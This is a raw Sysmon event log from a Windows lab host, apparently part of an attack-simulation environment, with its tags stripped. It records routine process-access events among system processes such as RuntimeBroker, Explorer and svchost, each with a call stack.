08:07:35.032{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FDE3576A929A954AA1264D96B4D9456,SHA256=1DEFF171E4AAB02F971BC1974B4C2D1EDD2E1BBB76DEBDDCD834C6F9EF5E60BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.496{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001054568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.496{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001054567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63565780C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63565780C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.482{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.434{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.412{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.396{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001054560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.396{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001054559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.396{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001054558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.396{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.396{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001054556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:35.381{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 